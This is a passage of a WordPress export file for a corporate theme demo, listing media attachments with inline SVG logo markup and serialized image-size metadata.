		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 143.2 31.3" style="enable-background:new 0 0 143.2 31.3;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x35_">
	<g>
		<path class="st0" d="M57.2,20.5h-3.1l-0.9-2.8h-4.5l-0.9,2.8h-3.1l4.6-12.6h3.4L57.2,20.5z M52.6,15.6l-1.4-4.2    C51.1,11,51,10.6,51,10.2h-0.1c0,0.4-0.1,0.7-0.2,1.1l-1.4,4.3H52.6z"></path>
		<path class="st0" d="M63.9,20.4c-0.4,0.2-1,0.3-1.9,0.3c-2,0-2.9-1-2.9-3v-4.1h-1.5v-2h1.5V9.6l2.8-0.8v2.7h2v2h-2v3.6    c0,0.9,0.4,1.4,1.1,1.4c0.3,0,0.6-0.1,0.9-0.3V20.4z"></path>
		<path class="st0" d="M69.8,20.8c-1.5,0-2.7-0.4-3.5-1.3s-1.3-2-1.3-3.4c0-1.5,0.4-2.7,1.3-3.5c0.9-0.8,2.1-1.3,3.6-1.3    c1.5,0,2.7,0.4,3.5,1.3c0.8,0.8,1.3,2,1.3,3.3c0,1.5-0.4,2.7-1.3,3.5S71.3,20.8,69.8,20.8z M69.9,13.5c-0.7,0-1.2,0.2-1.5,0.7    s-0.5,1.1-0.5,1.9c0,1.7,0.7,2.6,2.1,2.6c1.3,0,2-0.9,2-2.7C71.9,14.3,71.2,13.5,69.9,13.5z"></path>
		<path class="st0" d="M90.8,20.5H88v-5.1c0-1.3-0.5-2-1.4-2c-0.5,0-0.8,0.2-1.1,0.6S85,14.9,85,15.5v5h-2.8v-5.2    c0-1.3-0.5-1.9-1.4-1.9c-0.5,0-0.9,0.2-1.1,0.6c-0.3,0.4-0.4,0.9-0.4,1.5v5h-2.8v-9h2.8V13h0c0.3-0.5,0.7-0.9,1.2-1.2    c0.5-0.3,1.1-0.5,1.7-0.5c1.3,0,2.1,0.6,2.6,1.7c0.7-1.1,1.7-1.7,3-1.7c2,0,2.9,1.2,2.9,3.6V20.5z"></path>
		<path class="st0" d="M94.4,10.1c-0.5,0-0.9-0.1-1.2-0.4c-0.3-0.3-0.4-0.6-0.4-1c0-0.4,0.1-0.8,0.4-1s0.7-0.4,1.2-0.4    c0.5,0,0.9,0.1,1.2,0.4s0.4,0.6,0.4,1c0,0.4-0.1,0.8-0.4,1S94.9,10.1,94.4,10.1z M95.8,20.5H93v-9h2.8V20.5z"></path>
		<path class="st0" d="M104.9,20.2c-0.6,0.4-1.5,0.5-2.7,0.5c-1.4,0-2.5-0.4-3.4-1.3s-1.3-1.9-1.3-3.2c0-1.5,0.5-2.7,1.4-3.6    s2.1-1.3,3.7-1.3c1.1,0,1.8,0.1,2.3,0.4v2.4c-0.6-0.4-1.2-0.7-1.9-0.7c-0.8,0-1.4,0.2-1.9,0.7c-0.5,0.5-0.7,1.1-0.7,1.9    c0,0.8,0.2,1.4,0.7,1.9s1.1,0.7,1.8,0.7c0.7,0,1.4-0.2,2-0.7V20.2z"></path>
		<path class="st0" d="M111.4,20.1v-2.8c0.5,0.4,1.1,0.7,1.7,1c0.6,0.2,1.2,0.3,1.8,0.3c0.4,0,0.7,0,0.9-0.1    c0.3-0.1,0.5-0.2,0.7-0.3c0.2-0.1,0.3-0.2,0.4-0.4s0.1-0.3,0.1-0.5c0-0.2-0.1-0.5-0.2-0.7s-0.3-0.4-0.6-0.5s-0.5-0.3-0.9-0.5    s-0.7-0.3-1.1-0.5c-1-0.4-1.7-0.9-2.2-1.5c-0.5-0.6-0.7-1.3-0.7-2.1c0-0.7,0.1-1.2,0.4-1.7s0.6-0.9,1.1-1.2c0.5-0.3,1-0.5,1.6-0.7    c0.6-0.1,1.2-0.2,1.9-0.2c0.7,0,1.2,0,1.7,0.1c0.5,0.1,1,0.2,1.4,0.4v2.6c-0.2-0.1-0.4-0.3-0.7-0.4s-0.5-0.2-0.8-0.3    c-0.3-0.1-0.5-0.1-0.8-0.2c-0.3,0-0.5-0.1-0.7-0.1c-0.3,0-0.6,0-0.9,0.1c-0.3,0.1-0.5,0.1-0.7,0.3s-0.3,0.2-0.4,0.4    s-0.1,0.3-0.1,0.5c0,0.2,0.1,0.4,0.2,0.6c0.1,0.2,0.3,0.3,0.5,0.5c0.2,0.1,0.5,0.3,0.7,0.4s0.6,0.3,1,0.4c0.5,0.2,1,0.4,1.4,0.7    c0.4,0.2,0.7,0.5,1,0.8s0.5,0.6,0.7,1c0.2,0.4,0.2,0.8,0.2,1.3c0,0.7-0.1,1.3-0.4,1.8c-0.3,0.5-0.6,0.9-1.1,1.2    c-0.5,0.3-1,0.5-1.6,0.6c-0.6,0.1-1.2,0.2-1.9,0.2c-0.7,0-1.3-0.1-2-0.2C112.4,20.5,111.9,20.3,111.4,20.1z"></path>
		<path class="st0" d="M129.6,20.5h-7.6V7.9h7.3v2.3h-4.4v2.8h4.1v2.3h-4.1v2.9h4.7V20.5z"></path>
		<path class="st0" d="M137,20.8c-1.8,0-3.3-0.6-4.4-1.8c-1.1-1.2-1.7-2.7-1.7-4.6c0-2,0.6-3.6,1.7-4.8s2.7-1.8,4.6-1.8    c1.8,0,3.3,0.6,4.4,1.8c1.1,1.2,1.7,2.7,1.7,4.7c0,2-0.6,3.6-1.7,4.8C140.3,20.2,138.8,20.8,137,20.8z M137.1,10.2    c-1,0-1.8,0.4-2.4,1.1c-0.6,0.7-0.9,1.7-0.9,3c0,1.2,0.3,2.2,0.9,3s1.4,1.1,2.3,1.1c1,0,1.8-0.4,2.3-1.1s0.9-1.7,0.9-2.9    c0-1.3-0.3-2.3-0.8-3S138.1,10.2,137.1,10.2z"></path>
	</g>
	<path class="st0" d="M30.3,16.2c-1.3,0-2.4,1.1-2.4,2.4c0,0.3,0.1,0.7,0.2,1l-5.4,5.4c-0.2-0.1-0.4-0.3-0.6-0.4V9.8   c2.6-0.1,4.6-2.3,4.6-4.9c0-2.7-2.2-4.9-4.9-4.9s-4.9,2.2-4.9,4.9c0,0.7,0.1,1.3,0.4,1.9l-6.8,5.3c-1.1-1.1-2.6-1.7-4.3-1.7   c-3.4,0-6.2,2.8-6.2,6.2c0,3.4,2.8,6.2,6.2,6.2c3.4,0,6.2-2.8,6.2-6.2c0-1.1-0.3-2.1-0.8-3l6.7-5.2c0.5,0.6,1.2,1,2,1.2v14.7   c-1.9,0.1-3.3,1.7-3.3,3.5c0,2,1.6,3.6,3.6,3.6c2,0,3.6-1.6,3.6-3.6c0-0.5-0.1-0.9-0.3-1.3l5.6-5.6c0.3,0.1,0.6,0.2,1,0.2   c1.3,0,2.4-1.1,2.4-2.4C32.7,17.2,31.6,16.2,30.3,16.2z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>06</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/attachment/06/</link>
		<pubDate>Tue, 08 Sep 2020 03:54:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/06.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>515</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 03:54:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 03:54:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[06]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/06.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/06.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="&#x420;&#x435;&#x436;&#x438;&#x43C;_&#x438;&#x437;&#x43E;&#x43B;&#x44F;&#x446;&#x438;&#x438;" x="0px" y="0px" viewBox="0 0 128 29.8" style="enable-background:new 0 0 128 29.8;" xml:space="preserve">
<style type="text/css">
	.st0{fill:#FFFFFF;}
</style>
<g id="_x36_">
	<path class="st0" d="M12.4,9.9C10.7,8,8.2,7.2,5.8,7.5C5.6,7.9,5.4,8.3,5.2,8.7c1.3,0.3,2.6,0.9,3.6,2c2.5,2.7,2.3,6.9-0.4,9.4   c-0.9,0.9-2.1,1.4-3.2,1.6c0.1,0.2,0.2,0.4,0.3,0.5c2.3,0.5,4.7-0.1,6.5-1.8C15,17.6,15.2,12.9,12.4,9.9z M7.6,17.8   c1.4-1.9,1-4.7-1-6.1c-1.9-1.4-4.7-1-6.1,1C0.3,13,0.1,13.3,0,13.7c0.8-0.8,2-0.9,2.9-0.2c1,0.7,1.2,2.2,0.5,3.2   c-0.7,1-2.2,1.2-3.2,0.5c0,0-0.1,0-0.1-0.1c0.3,0.6,0.8,1.2,1.4,1.6C3.5,20.2,6.2,19.7,7.6,17.8z M20.7,7c-3.1-3.4-7.8-4.5-12-3.3   C8.6,3.8,8.6,3.9,8.5,3.9C7.9,4.5,7.3,5.1,6.9,5.7c2.7-0.2,5.5,0.7,7.5,2.9c3.4,3.7,3.1,9.4-0.6,12.8c-2,1.9-4.7,2.6-7.2,2.3   c0.3,0.4,0.6,0.8,1,1.2c0.3,0.4,0.7,0.7,1,1c3.8,1.2,8.2,0.4,11.4-2.5C24.7,19.1,25.1,11.8,20.7,7z M11.6,1.7   c4.1-0.5,8.5,0.9,11.5,4.2c5,5.4,4.6,13.8-0.8,18.8c-3,2.7-6.8,3.8-10.6,3.4c5.4,2.8,12.2,2.1,16.9-2.2c6.1-5.6,6.5-15,0.9-21.1   C24.9-0.3,17.5-1.4,11.6,1.7z"></path>
	<g>
		<path class="st0" d="M46.9,7.2h5.6c1.2,0,2.1,0.3,2.9,0.9c0.7,0.6,1.1,1.4,1.1,2.4c0,0.6-0.2,1.2-0.5,1.7    c-0.4,0.5-0.9,0.9-1.5,1.1c0.7,0.2,1.3,0.6,1.8,1.1c0.4,0.5,0.7,1.1,0.7,1.9c0,1-0.4,1.9-1.2,2.5c-0.8,0.6-1.8,1-3,1h-5.9V7.2z     M52.3,9h-3.2v3.5h3.2c0.6,0,1.1-0.2,1.5-0.5c0.4-0.3,0.6-0.7,0.6-1.3s-0.2-1-0.6-1.3C53.4,9.1,52.9,9,52.3,9z M52.5,18    c0.7,0,1.2-0.2,1.6-0.5c0.4-0.4,0.6-0.8,0.6-1.4s-0.2-1.1-0.6-1.4c-0.4-0.3-0.9-0.5-1.6-0.5h-3.4V18H52.5z"></path>
		<path class="st0" d="M58.8,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1C64.6,19.9,64,20,63.3,20s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C58.9,16.6,58.8,16,58.8,15.3z M63.3,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C62,18,62.6,18.2,63.3,18.2z"></path>
		<path class="st0" d="M69.6,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C69.7,16.6,69.6,16,69.6,15.3z M74.2,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1C72.8,18,73.4,18.2,74.2,18.2z"></path>
		<path class="st0" d="M80,18.8l1-1.4c0.6,0.4,1.1,0.6,1.5,0.8c0.4,0.2,0.9,0.2,1.3,0.2c0.5,0,1-0.1,1.3-0.3s0.5-0.5,0.5-0.9    c0-0.3-0.1-0.5-0.3-0.7s-0.5-0.3-0.9-0.4l-1.6-0.3c-0.9-0.2-1.5-0.4-2-0.9c-0.4-0.4-0.7-1-0.7-1.6c0-0.8,0.3-1.5,1-2    c0.6-0.5,1.5-0.8,2.5-0.8c0.6,0,1.2,0.1,1.8,0.3c0.6,0.2,1.2,0.4,1.7,0.8l-1,1.3c-0.5-0.3-0.9-0.5-1.4-0.7    c-0.4-0.1-0.9-0.2-1.3-0.2c-0.5,0-0.8,0.1-1.1,0.3c-0.3,0.2-0.4,0.4-0.4,0.8c0,0.3,0.1,0.5,0.3,0.6c0.2,0.1,0.5,0.3,1,0.3l1.6,0.3    c0.9,0.2,1.6,0.5,2,0.9c0.4,0.4,0.7,1,0.7,1.6c0,0.4-0.1,0.8-0.3,1.2c-0.2,0.4-0.4,0.7-0.8,0.9s-0.7,0.5-1.2,0.6    c-0.5,0.1-0.9,0.2-1.4,0.2c-0.8,0-1.5-0.1-2.2-0.3S80.5,19.2,80,18.8z"></path>
		<path class="st0" d="M90.4,17.4v-5h-1.8v-1.6h1.8V8.3l2-0.4v2.9h2.5v1.6h-2.5V17c0,0.4,0.1,0.8,0.3,0.9c0.2,0.2,0.5,0.3,1,0.3    c0.2,0,0.4,0,0.6,0c0.2,0,0.4-0.1,0.7-0.2v1.7c-0.3,0.1-0.6,0.1-0.9,0.2c-0.3,0-0.6,0.1-0.9,0.1c-0.9,0-1.6-0.2-2.1-0.6    S90.4,18.3,90.4,17.4z"></path>
		<path class="st0" d="M104.3,18.7c-0.6,0.5-1.1,0.8-1.7,1c-0.6,0.2-1.2,0.3-1.9,0.3c-0.6,0-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.5-1    s-0.7-0.9-1-1.5s-0.4-1.2-0.4-1.8c0-0.7,0.1-1.3,0.3-1.8c0.2-0.6,0.5-1.1,0.9-1.5s0.9-0.7,1.4-1s1.1-0.4,1.7-0.4    c0.6,0,1.2,0.1,1.7,0.4c0.5,0.2,1,0.6,1.3,1s0.7,0.9,0.9,1.5c0.2,0.6,0.3,1.2,0.3,1.9v0.5h-6.7c0.1,0.7,0.4,1.3,0.9,1.8    s1.1,0.7,1.8,0.7c0.4,0,0.8-0.1,1.2-0.2c0.4-0.1,0.7-0.4,0.9-0.6L104.3,18.7z M100.5,12.3c-0.6,0-1.1,0.2-1.5,0.6    c-0.4,0.4-0.7,1-0.8,1.6h4.7c-0.1-0.7-0.4-1.2-0.8-1.6S101.1,12.3,100.5,12.3z"></path>
		<path class="st0" d="M106.9,19.8v-9h2v2c0.2-0.7,0.6-1.2,1-1.6s0.9-0.5,1.5-0.5c0.2,0,0.3,0,0.4,0.1c0.1,0,0.3,0.1,0.4,0.1v1.8    c-0.2-0.1-0.3-0.1-0.5-0.2s-0.4-0.1-0.6-0.1c-0.5,0-0.9,0.1-1.3,0.4c-0.4,0.3-0.7,0.6-0.9,1.1v5.9H106.9z"></path>
		<path class="st0" d="M115,9c-0.3,0-0.6-0.1-0.9-0.4s-0.4-0.5-0.4-0.9c0-0.3,0.1-0.6,0.4-0.9c0.3-0.3,0.5-0.4,0.9-0.4    c0.3,0,0.6,0.1,0.9,0.4c0.3,0.3,0.4,0.5,0.4,0.9c0,0.3-0.1,0.6-0.4,0.9S115.3,9,115,9z M116,10.8v9h-2v-9H116z"></path>
		<path class="st0" d="M118.1,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C118.2,16.6,118.1,16,118.1,15.3z M122.6,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1    C121.3,18,121.9,18.2,122.6,18.2z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>testi2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/testi2/</link>
		<pubDate>Tue, 08 Sep 2020 04:12:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/testi2.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>518</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:12:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:12:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[testi2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/testi2.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/testi2.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:90;s:6:"height";i:90;s:4:"file";s:20:"2020/09/testi2.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>testi3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/testi3/</link>
		<pubDate>Tue, 08 Sep 2020 04:12:53 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/testi3.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>519</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:12:53]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:12:53]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[testi3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/testi3.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/testi3.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:90;s:6:"height";i:90;s:4:"file";s:20:"2020/09/testi3.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/bg2-about-us/</link>
		<pubDate>Tue, 08 Sep 2020 04:13:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>520</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:13:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:13:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:938;s:4:"file";s:26:"2020/09/bg2-about-us.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:26:"bg2-about-us-1-300x147.jpg";s:5:"width";i:300;s:6:"height";i:147;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"bg2-about-us-1-1024x500.jpg";s:5:"width";i:1024;s:6:"height";i:500;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"bg2-about-us-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"bg2-about-us-1-768x375.jpg";s:5:"width";i:768;s:6:"height";i:375;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:27:"bg2-about-us-1-1536x750.jpg";s:5:"width";i:1536;s:6:"height";i:750;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"bg2-about-us-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"bg2-about-us-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:27:"bg2-about-us-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:27:"bg2-about-us-1-1200x938.jpg";s:5:"width";i:1200;s:6:"height";i:938;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/team1/</link>
		<pubDate>Tue, 08 Sep 2020 04:36:18 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/team1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>524</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:36:18]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:36:18]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[team1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/team1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/team1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:833;s:4:"file";s:19:"2020/09/team1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:19:"team1-1-270x300.jpg";s:5:"width";i:270;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:19:"team1-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:19:"team1-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:19:"team1-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"team1-1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>team2</title>
